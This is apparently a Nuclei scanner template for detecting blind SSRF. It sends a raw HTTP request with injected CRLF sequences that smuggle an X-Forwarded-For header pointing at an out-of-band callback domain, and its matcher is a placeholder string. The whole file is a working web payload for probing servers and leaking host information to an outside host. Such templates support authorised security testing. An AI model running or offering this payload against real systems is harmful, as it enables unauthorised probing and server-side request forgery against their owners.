id: 0x098

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
    - |+
      GET /%20HTTP/1.10x0D0x0ADX-Forwarded-For:%20{{Host}}.{{Port}}.BSSRF-098.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
      Cache-Control: no-transform
      Accept-Encoding: gzip, deflate
      Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
